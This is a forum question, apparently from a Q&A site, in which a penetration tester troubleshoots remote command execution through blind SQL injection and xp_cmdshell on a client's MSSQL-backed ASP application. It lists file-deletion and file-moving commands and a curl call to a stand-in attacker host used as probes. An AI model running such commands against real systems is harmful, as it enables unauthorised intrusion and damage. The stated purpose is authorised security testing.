5Nis
xp_cmdshell as dbo user only able to run ‘ping localhost’ to verify RCE?
I am doing a pentest on a client's ASP web application and I have identified a blind SQL injection. However, after enabling xp_cmdshell, I am only able to run the ping localhost command to verify the RCE, which has a 3-second delay. I also tried to run ping -n 10 localhost and it has a ~10s delay as well.
I am fairly certain that there is an RCE here, but I can't seem to run other commands such as:
mkdir C:\Windows\Temp\pwned
mkdir C:\inetpub\wwwroot\pwned
del C:\Windows\Temp\randomFile
move C:\Windows\Temp\randomFile C:\Windows\Temp\randomFile2
curl http://attackerIP:80 (blocked by firewall)
I also managed to extract the username using the SELECT CURRENT_USER; command using the blind SQL vulnerability and it is dbo. The database version is MSSQL 2006.
What are some possible reasons that I am only able to run the ping localhost command and not others?